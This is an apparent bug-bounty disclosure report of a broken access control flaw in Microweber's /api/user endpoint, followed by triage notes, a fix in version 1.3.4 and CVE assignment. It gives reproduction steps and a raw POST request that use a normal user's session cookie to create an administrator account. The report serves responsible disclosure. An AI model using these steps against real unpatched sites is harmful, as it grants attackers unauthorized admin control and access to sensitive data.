Broken Access Control on "http://localhost/api/user" endpoint in microweber/microweber


Reported on

Mar 16th 2023


Able to create an Admin account from normal User account.


1.Navigate to https://localhost/.

2.Then click on login and then register, fill the form and click Register.

3.Now login with a newly created user account with intercepting the traffics in burp.

4.Turn on the burp intercept on and refresh the page and copy the laravel_session on cookie.

5.Now send the below POST request with the copied user laravel_session.

POST /api/user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 193
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/admin/view:modules/load_module:users/edit-user:0
Cookie: laravel_session=XDkQKNuW---Qs22;


6.In the response it says 201 created. New Admin-account successfully created.

7.Now you can login with the credentials you sended on POST Request as an Admin-user on http://localhost/admin/login.



Able to create an Admin account from normal User account of the website. Access to all sensitive data's and privileges of an admin to a normal user.

We are processing your report and will contact the microweber team within 24 hours. 9 months ago
cyberneticsplus modified the report
9 months ago
We have contacted a member of the microweber team and are waiting to hear back 8 months ago
Peter Ivanov modified the Severity from Critical (9.8) to High (8.8) 8 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability 8 months ago
cyberneticsplus has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.3.4 with commit f43d5b 8 months ago
Peter Ivanov has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Apr 22nd 2023
Peter Ivanov published this vulnerability 7 months ago
to join this conversation